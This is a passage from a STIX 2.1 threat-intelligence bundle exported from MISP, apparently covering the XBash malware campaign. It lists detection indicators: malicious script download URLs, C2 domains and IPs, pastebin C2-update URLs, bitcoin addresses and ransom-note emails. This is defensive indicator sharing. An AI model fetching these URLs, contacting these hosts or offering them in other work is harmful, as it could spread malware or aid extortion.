|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/XbashY']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/xapache']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/libhttpd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:11.000Z",
|
|
"modified": "2018-09-19T04:47:11.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/rootv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:11.000Z",
|
|
"modified": "2018-09-19T04:47:11.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l2/rootv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:12.000Z",
|
|
"modified": "2018-09-19T04:47:12.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:12.000Z",
|
|
"modified": "2018-09-19T04:47:12.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/12/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d1-1698-491d-a555-4331950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:13.000Z",
|
|
"modified": "2018-09-19T04:47:13.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/lowerv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:13.000Z",
|
|
"modified": "2018-09-19T04:47:13.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashX']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://png.realtimenews.tk/m.png']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://daknobcq4zal6vbm.tk/tt.txt']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:15.000Z",
|
|
"modified": "2018-09-19T04:47:15.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://d3goboxon32grk2l.tk/reg9.sct']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:47.000Z",
|
|
"modified": "2018-09-19T04:47:47.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'ejectrift.censys.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:47.000Z",
|
|
"modified": "2018-09-19T04:47:47.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.censys.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'api.leakingprivacy.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'news.realnewstime.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.realnewstime.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:49.000Z",
|
|
"modified": "2018-09-19T04:47:49.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'news.realtimenews.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:49.000Z",
|
|
"modified": "2018-09-19T04:47:49.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scanaan.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:50.000Z",
|
|
"modified": "2018-09-19T04:47:50.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.3g2upl4pq6kufc4m.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:50.000Z",
|
|
"modified": "2018-09-19T04:47:50.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.vfk2k5s5tfjr27tz.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:51.000Z",
|
|
"modified": "2018-09-19T04:47:51.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.blockbitcoin.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:51.000Z",
|
|
"modified": "2018-09-19T04:47:51.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'blockbitcoin.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:08.000Z",
|
|
"modified": "2018-09-19T04:48:08.000Z",
|
|
"description": "IPs for C2 Communication",
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '142.44.215.177']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"ip-dst\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:09.000Z",
|
|
"modified": "2018-09-19T04:48:09.000Z",
|
|
"description": "IPs for C2 Communication",
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.217.61.147']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"ip-dst\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:31.000Z",
|
|
"modified": "2018-09-19T04:48:31.000Z",
|
|
"description": "URLs for C2 Domain Updating",
|
|
"pattern": "[url:value = 'https://pastebin.com/raw/Xu74Mzif']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:31.000Z",
|
|
"modified": "2018-09-19T04:48:31.000Z",
|
|
"description": "URLs for C2 Domain Updating",
|
|
"pattern": "[url:value = 'https://pastebin.com/raw/rBHjTZY6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:02.000Z",
|
|
"modified": "2018-09-19T04:49:02.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr"
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:02.000Z",
|
|
"modified": "2018-09-19T04:49:02.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:35.000Z",
|
|
"modified": "2018-09-19T04:49:35.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupsql@protonmail.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d560-0e08-460b-9909-480b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:36.000Z",
|
|
"modified": "2018-09-19T04:49:36.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupsql@pm.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:36.000Z",
|
|
"modified": "2018-09-19T04:49:36.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupdatabase@pm.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:50:52.000Z",
|
|
"modified": "2018-09-19T04:50:52.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
